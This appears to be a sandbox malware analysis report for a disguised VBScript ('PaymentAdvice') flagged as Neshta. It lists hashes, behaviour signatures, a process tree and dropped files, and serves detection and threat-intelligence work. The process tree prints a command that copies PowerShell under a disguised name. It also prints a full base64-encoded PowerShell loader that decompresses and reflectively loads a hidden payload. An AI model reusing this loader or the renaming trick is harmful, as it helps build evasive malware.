Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 12:38

General

  • Target

    PaymentAdvice-1629043.vbs

  • Size

    2.3MB

  • MD5

    9d7aa394cb39af2a434eb3036a35bb47

  • SHA1

    bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f

  • SHA256

    490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea

  • SHA512

    3b2da959a16b915d52ceadb8336fc5478e7d579a38cf59fe34f15744a0017ea9907bf5b62b4670ea123b223a0af7f3e96ab03d132055a1afd8e6983a4f856033

  • SSDEEP

    24576:dGPQzVpL6fvkC6MugzlGbhhkg6XCoCK86uTK6ClN3Br6kXIEHIQCobtMvQ8rAOSP:dGcJXxTqb38jR/4RzGfFVvC

Malware Config

Signatures

  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Neshta family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3536
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs"
        2⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe
          "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Drops startup file
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4920
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Modifies system executable filetype association
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:1748
    • C:\Windows\system32\cmd.exe
      cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" /Y
      1⤵
      • Process spawned unexpected child process
      PID:3724

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

      Filesize

      86KB

      MD5

      a19e4a96ec5d5485b9574701f725b974

      SHA1

      9473682ece20859be37bd4e4217f47596fe305d7

      SHA256

      29d948687548a1374710fd24591ea81a5e3bcddf52b2a121c9627704f2f98e97

      SHA512

      73aabc378bd230e5383587ccbf9d1bb4d1e25f9880097d6204e8de5b4457e903ea5351bf10dddaa14c4650a4d91172495d8f5f06e63473f8bc43d1442db286e3

    • C:\Users\Admin\AppData\Local\Temp\3582-490\InstallUtil.exe

      Filesize

      40KB

      MD5

      7fe6fb5408992330ada9cd81be35c33b

      SHA1

      2f732ea754fa43dea05fdad5c821f008a92935e2

      SHA256

      8b53f3559183d6206e2573a0c3813141cad7621ee93a5241c622cf7c664d9aee

      SHA512

      630cd455c5c4367e7d4a423d78b69e8f8ca02aa16b2af65d7357420511a692b233c04dc5d8aaafe3eb477b57a37a3ed0ee5b807a66c6fbaa223ac0abd22176ec

    • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe

      Filesize

      423KB

      MD5

      c32ca4acfcc635ec1ea6ed8a34df5fac

      SHA1

      f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

      SHA256

      73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

      SHA512

      6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajviy3a5.rib.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4920-4-0x00000000751EE000-0x00000000751EF000-memory.dmp

      Filesize

      4KB

    • memory/4920-5-0x0000000004F10000-0x0000000004F46000-memory.dmp

      Filesize

      216KB

    • memory/4920-8-0x00000000751E0000-0x0000000075990000-memory.dmp

      Filesize

      7.7MB

    • memory/4920-7-0x0000000005580000-0x0000000005BA8000-memory.dmp

      Filesize

      6.2MB

    • memory/4920-6-0x00000000751E0000-0x0000000075990000-memory.dmp

      Filesize

      7.7MB

    • memory/4920-9-0x00000000054F0000-0x0000000005512000-memory.dmp

      Filesize

      136KB

    • memory/4920-10-0x0000000005C20000-0x0000000005C86000-memory.dmp

      Filesize

      408KB

    • memory/4920-11-0x0000000005C90000-0x0000000005CF6000-memory.dmp

      Filesize

      408KB

    • memory/4920-21-0x0000000005D80000-0x00000000060D4000-memory.dmp

      Filesize

      3.3MB

    • memory/4920-22-0x0000000006490000-0x00000000064AE000-memory.dmp

      Filesize

      120KB

    • memory/4920-23-0x00000000064D0000-0x000000000651C000-memory.dmp

      Filesize

      304KB

    • memory/4920-24-0x0000000007460000-0x00000000074F6000-memory.dmp

      Filesize

      600KB

    • memory/4920-25-0x00000000069F0000-0x0000000006A0A000-memory.dmp

      Filesize

      104KB

    • memory/4920-26-0x0000000006A40000-0x0000000006A62000-memory.dmp

      Filesize

      136KB

    • memory/4920-27-0x0000000007AB0000-0x0000000008054000-memory.dmp

      Filesize

      5.6MB

    • memory/4920-28-0x00000000086E0000-0x0000000008D5A000-memory.dmp

      Filesize

      6.5MB

    • memory/4920-29-0x0000000007830000-0x0000000007982000-memory.dmp

      Filesize

      1.3MB

    • memory/4920-30-0x0000000008060000-0x00000000080F2000-memory.dmp

      Filesize

      584KB

    • memory/4920-31-0x0000000007A30000-0x0000000007A3A000-memory.dmp

      Filesize

      40KB

    • memory/4920-32-0x00000000082F0000-0x00000000083FE000-memory.dmp

      Filesize

      1.1MB

    • memory/4920-44-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-82-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-96-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-94-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-92-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-90-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-88-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-86-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-84-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-80-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-78-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-76-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-74-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-72-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-70-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-69-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-66-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-64-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-62-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-60-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-58-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-56-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-54-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-53-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-50-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-48-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-42-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-40-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-39-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-36-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-34-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-46-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-33-0x00000000082F0000-0x00000000083F8000-memory.dmp

      Filesize

      1.0MB

    • memory/4920-1209-0x0000000008420000-0x000000000849E000-memory.dmp

      Filesize

      504KB

    • memory/4920-1210-0x00000000084A0000-0x00000000084EC000-memory.dmp

      Filesize

      304KB

    • memory/4920-1211-0x0000000008500000-0x0000000008554000-memory.dmp

      Filesize

      336KB

    • memory/4920-1221-0x00000000751E0000-0x0000000075990000-memory.dmp

      Filesize

      7.7MB